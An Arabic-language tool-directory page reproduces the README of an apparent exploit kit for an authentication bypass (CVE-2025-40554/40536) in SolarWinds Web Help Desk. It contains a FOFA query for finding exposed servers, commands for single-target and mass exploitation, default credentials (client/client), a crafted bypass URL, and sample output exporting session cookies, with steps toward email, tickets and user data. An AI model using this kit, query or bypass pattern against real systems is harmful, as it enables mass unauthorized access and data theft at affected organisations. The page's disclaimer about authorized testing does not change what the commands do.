Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-40554 — استغلال CVE-2025-40554 | Kitploit
أدوات/GitHubGitHub/skynoxk/cve-2025-40554
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالمصادقة
GitHubskynoxk/cve-2025-40554

CVE-2025-40554

استغلال CVE-2025-40554

عرض المستودع
2منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مجموعة استغلال CVE-2025-40554

أداة اختبار أمنية شاملة لكشف واستغلال ثغرة تجاوز المصادقة (CVE-2025-40554 / CVE-2025-40536) في SolarWinds Web Help Desk.

⚠️ إخلاء مسؤولية

لأغراض التعليم واختبار الأمان المصرح به فقط

هذه الأداة مُقدمة لأغراض البحث الأمني، واختبار الاختراق، وتقييم الثغرات على الأنظمة التي تمتلكها أو لديك إذن كتابي صريح لاختبارها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. المؤلفون غير مسؤولين عن سوء الاستخدام أو الضرر الناجم عن هذه الأداة.

🔍 نظرة عامة على الثغرة

CVE-2025-40554 هي ثغرة خطيرة في تجاوز المصادقة في SolarWinds Web Help Desk تسمح للمهاجمين غير المصادقين بـ:

  • تجاوز آليات المصادقة
  • الوصول إلى وظائف إدارية مميزة (المصادقة)
  • تعداد تكوين النظام

الإصدارات المتأثرة

  • SolarWinds Web Help Desk (ينبغي التحقق من معلومات الإصدار المحدد)
  • راجع النشرات الأمنية من SolarWinds للإصدارات التي تم تصحيحها

🚀 الميزات

اكتشف بنفسك :)

التبعيات:

  • Python 3.6+
  • مكتبة requests
  • مكتبة urllib3

🛠️ التثبيت

root@kitploit:~
# Clone or download the script
wget https://raw.githubusercontent.com/username/repo/main/CVE-2025-40554.py

# Make executable
chmod +x CVE-2025-40554.py

📖 FOFA

root@kitploit:~
("Web Help Desk") && (icon_hash="1895809524" || icon_hash="804130677")

📖 الاستخدام

الفحص الأساسي (هدف واحد)

root@kitploit:~
# Simple vulnerability check
python3 CVE-2025-40554.py -t https://target:8443

# With explicit protocol
python3 CVE-2025-40554.py -t https://203.106.221.203:8443

وضع الاستغلال الكامل

root@kitploit:~
# Complete exploitation with session enumeration
python3 CVE-2025-40554.py -t https://target:8443 --exploit

# Skip default credential testing
python3 CVE-2025-40554.py -t https://target:8443 --exploit --no-login

الفحص الجماعي

root@kitploit:~
# Scan multiple targets from file
python3 CVE-2025-40554.py -l targets.txt

# Bulk scan with exploitation
python3 CVE-2025-40554.py -l targets.txt --exploit

# Quiet mode (minimal output)
python3 CVE-2025-40554.py -l targets.txt -q

# Custom output file
python3 CVE-2025-40554.py -l targets.txt -o results.txt

تنسيق ملف الأهداف

targets.txt:

root@kitploit:~
https://target1:8443
https://target2.example.com:8443
192.168.1.100:8443
target3.local:8443
# Comments are supported

🎯 خيارات سطر الأوامر

📊 أمثلة على الإخراج

استغلال ناجح

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════╗
║     CVE-2025-40554 - SolarWinds Web Help Desk                    ║
║     Authentication Bypass Exploitation Tool                       ║
║     Research & Educational Purposes Only                          ║
╚═══════════════════════════════════════════════════════════════════╝

======================================================================
Target: https://203.106.221.203:8443
======================================================================
[*] Step 1: Establishing session...
[+] WOSID extracted: AbCdEfGhIjKlMnOpQrStU
[+] XSRF token: abc123-def456-ghi789

[*] Step 2: Testing authentication bypass...
[+] Found bypass indicators: externalAuthContainer, JSONRpcClient, SAML 2.0
[+] VULNERABLE - Auth bypass confirmed!

[*] Step 3: Testing default credentials (client/client)...
[+] SUCCESS - Default credentials work!

======================================================================
EXPLOITATION MODE - CVE-2025-40554 Auth Bypass
======================================================================

[*] Bypass URL: https://203.106.221.203:8443/helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/AbCdEfGhIjKlMnOpQrStU/1.0?badparam=/ajax/&wopage=LoginPref
[*] Triggering authentication bypass...
[+] Auth bypass successful!

[*] Session Cookies:
  wosid = AbCdEfGhIjKlMnOpQrStU
  XSRF-TOKEN = abc123-def456-ghi789

======================================================================
SUMMARY
======================================================================
[+] Target is VULNERABLE to CVE-2025-40554
[+] Default credentials: WORK
======================================================================

نتائج الفحص الجماعي

root@kitploit:~
[*] Loaded 5 unique targets from targets.txt
[*] Mode: Bypass + default credential test
[*] Full exploitation enabled

[1/5] Testing https://target1:8443
[+] VULNERABLE - Auth bypass confirmed!
[+] SUCCESS - Default credentials work!

[2/5] Testing https://target2:8443
[!] NOT VULNERABLE - Auth bypass failed

...

======================================================================
SCAN SUMMARY
======================================================================
Total scanned:     5/5
Vulnerable:        2
With def. creds:   1
======================================================================

[+] Results saved to: vulnerable_targets.txt

🔧 تفاصيل تقنية

تدفق الاستغلال

  1. إنشاء الجلسة

    • الاتصال بمثيل WHD
    • استخراج WOSID (معرف جلسة WebObjects) من مصادر متعددة
    • التقاط رمز XSRF إن وجد
  2. تجاوز المصادقة

    • صياغة عنوان URL ضار مع حقن WOSID
    • استغلال اجتياز المسار في توجيه WebObjects
    • تجاوز فحوصات المصادقة
  3. اختبار بيانات الاعتماد (اختياري)

    • تحليل نموذج تسجيل الدخول مع حماية CSRF
    • اختبار بيانات الاعتماد الافتراضية (client/client)
    • التحقق من نجاح المصادقة
  4. الاستغلال الكامل (وضع --exploit)

    • تصدير ملفات تعريف الارتباط للجلسة
    • الوصول إلى البريد الإلكتروني، التذاكر، قاعدة البيانات، المستخدمون (تمت الإزالة)

مؤشرات الثغرة

تكتشف الأداة النجاح في التجاوز من خلال التحقق من:

  • externalAuthContainer - تكوين المصادقة الخارجية
  • JSONRpcClient - تعرض عميل API
  • SAML 2.0 - تكوين الدخول الموحد SSO
  • LoginPref - إعدادات تفضيلات تسجيل الدخول
  • authMode - إعدادات وضع المصادقة

🤝 المساهمة

المساهمات مرحب بها.....

📚 المراجع

  • تفاصيل CVE-2025-40554
  • تفاصيل CVE-2025-40536
  • النشرات الأمنية من SolarWinds
  • وثائق إطار عمل WebObjects

📄 الترخيص

هذه الأداة مُقدمة "كما هي" دون أي ضمان من أي نوع. الاستخدام على مسؤوليتك الخاصة.

👤 المؤلف

Skynoxk


تذكر: دائماً اختبر الاختراق أخلاقياً وقانونياً. الوصول غير المصرح به جريمة.

تنزيل الأداة
الخيارالوصف
-t, --target URLعنوان URL لهدف واحد للاختبار
-l, --list FILEملف يحتوي على قائمة بالأهداف (هدف واحد في كل سطر)
--exploitتمكين وضع الاستغلال الكامل مع التعداد
--no-loginتخطي اختبار بيانات الاعتماد الافتراضية
-o, --output FILEملف الإخراج للأهداف القابلة للاستغلال (الافتراضي: vulnerable_targets.txt)
-q, --quietوضع الإخراج المحدود (مفيد للفحوصات الجماعية)